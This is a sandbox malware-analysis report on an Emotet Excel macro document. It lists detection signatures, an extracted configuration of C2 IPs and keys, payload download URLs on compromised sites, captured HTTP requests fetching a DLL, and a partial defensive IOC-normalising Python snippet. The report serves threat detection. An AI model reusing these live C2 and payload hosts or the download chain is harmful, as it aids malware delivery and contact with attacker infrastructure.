Windows Analysis Report
NZW-010122 BNUV-280122.xlsm

Overview

General Information

Sample Name: NZW-010122 BNUV-280122.xlsm
Analysis ID: 562386
MD5: acbaebd7bb2090b795b481d48453b3fa
SHA1: a06b2a6d2a15d070262144854ea4ace65cb71892
SHA256: c81e4045b744f1e7aed46015f3f3a1de5078b95d908b966a56724965fb5b91e2

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

Source: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE Avira URL Cloud: Label: phishing
Source: http://ancyh.xyz Avira URL Cloud: Label: malware
Source: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE Avira URL Cloud: Label: malware
Source: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE Avira URL Cloud: Label: malware
Source: http://sep.dfwsolar.club/hzh3v/z Avira URL Cloud: Label: malware
Source: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/ Avira URL Cloud: Label: malware
Source: http://weezual.fr/ju9c/twEHJDCvNwGimD/ Avira URL Cloud: Label: malware
Source: http://danahousecare.com/wp-cont Avira URL Cloud: Label: malware
Source: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE Avira URL Cloud: Label: malware
Source: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/cc/vv/fe.png Avira URL Cloud: Label: malware
Source: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE Avira URL Cloud: Label: malware
Source: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/ Avira URL Cloud: Label: phishing
Source: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE Avira URL Cloud: Label: malware
Source: http://firstfitschool.com/83wg6z Avira URL Cloud: Label: phishing
Source: http://91.240.118.172/cc/vv/fe.html#H Avira URL Cloud: Label: malware
Source: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/ Avira URL Cloud: Label: malware
Source: http://ancyh.xyz/assets/Pcxv1k5/ Avira URL Cloud: Label: malware
Source: http://ancyh.xyz/assets/Pcxv1k5/PE Avira URL Cloud: Label: malware
Source: http://weezual.fr/ju9c/twEHJDCvNwGimD/PE Avira URL Cloud: Label: malware
Source: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/ Avira URL Cloud: Label: malware
Source: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE Avira URL Cloud: Label: malware
Source: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/ Avira URL Cloud: Label: malware
Source: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE Avira URL Cloud: Label: malware
Source: http://michaelcrompton.co.uk/wp-admin/G/ Avira URL Cloud: Label: malware
Source: http://michaelcrompton.co.uk/wp-admin/G/PE Avira URL Cloud: Label: malware
Source: http://chupahfashion.com/eh6bwxk Avira URL Cloud: Label: malware
Source: http://91.240.118.172/cc/vv/fe.html Avira URL Cloud: Label: malware
Source: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/ Avira URL Cloud: Label: malware
Source: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/ Avira URL Cloud: Label: malware
Source: 16.2.rundll32.exe.320000.3.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Source: C:\ProgramData\JooSee.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB4 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb: source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdbm source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B7E00 FindFirstFileW, 16_2_002B7E00

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
Source: global traffic DNS query: name: weezual.fr
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

Networking

Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1Host: weezual.frConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Fox-CCFS/zBdGqiyW1HTZD2j/ HTTP/1.1Host: mycloud.suplitecmo.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.27set-cookie: 61f44686eb699=1643398790; expires=Fri, 28-Jan-2022 19:40:50 GMT; Max-Age=60; path=/cache-control: no-cache, must-revalidatepragma: no-cachelast-modified: Fri, 28 Jan 2022 19:39:50 GMTexpires: Fri, 28 Jan 2022 19:39:50 GMTcontent-type: application/x-msdownloadcontent-disposition: attachment; filename="10ZDUhs9FtE0wMo.dll"content-transfer-encoding: binarycontent-length: 548864date: Fri, 28 Jan 2022 19:39:50 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
Source: unknown Network traffic detected: IP country count 21
Source: powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000003.420818085.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439097274.0000000003CF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.html
Source: mshta.exe, 00000004.00000003.436214904.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.438128891.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420818085.000000000041D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.html#H
Source: mshta.exe, 00000004.00000003.436133193.00000000003EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420800489.00000000003EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437986864.00000000003EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.html(
Source: NZW-010122 BNUV-280122.xls.0.dr String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlB
Source: mshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlT
Source: mshta.exe, 00000004.00000002.437108931.0000000000330000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.422944437.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.422354344.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlhttp://91.240.118.172/cc/vv/fe.html
Source: mshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmli
Source: mshta.exe, 00000004.00000002.437108931.0000000000330000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlngs
Source: mshta.exe, 00000004.00000003.420780191.00000000003B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmly
Source: powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.p
Source: powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.682696599.000000001B91A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.png
Source: powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.pngPE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ancyh.xyz
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ancyh.xyz/assets/Pcxv1k5/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ancyh.xyz/assets/Pcxv1k5/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://chupahfashion.com/eh6bwxk
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000010.00000002.677072808.00000000005CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000010.00000002.677072808.00000000005CC000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.16.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000010.00000002.677072808.00000000005CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enZ6oW.
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://danahousecare.com/wp-cont
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://firstfitschool.com/83wg6z
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk/wp-
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk/wp-admin/G/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk/wp-admin/G/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.s
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com/Fo
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwso
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwsolar.club/hzh3v/z
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stancewheels.com/wp-admin
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.f
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr/ju9c/twEHJDCvN
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr/ju9c/twEHJDCvNwGimD/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr/ju9c/twEHJDCvNwGimD/PE
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000006.00000002.676609575.000000000028B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.676609575.000000000028B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.420721916.0000000003C80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/AUhFYYAjKIJ
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hekmat20.com/wp-includes
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hekmat20.com/wp-includes/7/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hekmat20.com/wp-includes/7/PE
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lambayeque.apiperu.net.p
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE
Source: rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.belajarngaji.shop/wp
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/
Source: powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE
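The URL hits listed above are raw memory strings rather than a clean indicator list: several entries are truncated prefixes of the same URL, and the variants ending in "PE" are the URL immediately followed by adjacent bytes in memory (the request actually observed on weezual.fr further down is GET /ju9c/twEHJDCvNwGimD/, without that suffix). The Python below is an editor-added example, not part of the sandbox report, showing how an analyst can collapse such hits into a deduplicated IOC set and separate the PowerShell stage's download URLs from the rundll32 stage's C2 strings. The stage labels, the handling of the "PE" suffix and the list of certificate-policy hosts to discard are the editor's assumptions; the input lines are copied from the report.

```python
"""Collapse raw 'String found in binary or memory' URL hits into an IOC set.

Added example, not part of the sandbox report.  Input lines are copied from
the report; stage labels and the cert-policy host list are assumptions.
"""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlparse

_HIT = re.compile(
    r"^Source: (?P<proc>[\w.]+),.*?String found in binary or memory: (?P<url>\S+)$"
)

# Assumption: CPS URLs embedded in the X.509 certificates of signed system
# DLLs, not attacker infrastructure.  The stray trailing "0"/"02" in the
# report is consistent with reading past the string into ASN.1 length bytes.
CERT_POLICY_HOSTS = {"www.digicert.com.my", "www.diginotar.nl", "secure.comodo.com"}


def _host(url):
    try:
        return (urlparse(url).hostname or "").lower()
    except ValueError:
        return ""


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def normalize_iocs(lines):
    """Return sorted URL lists keyed by 'payload_url', 'c2_candidate',
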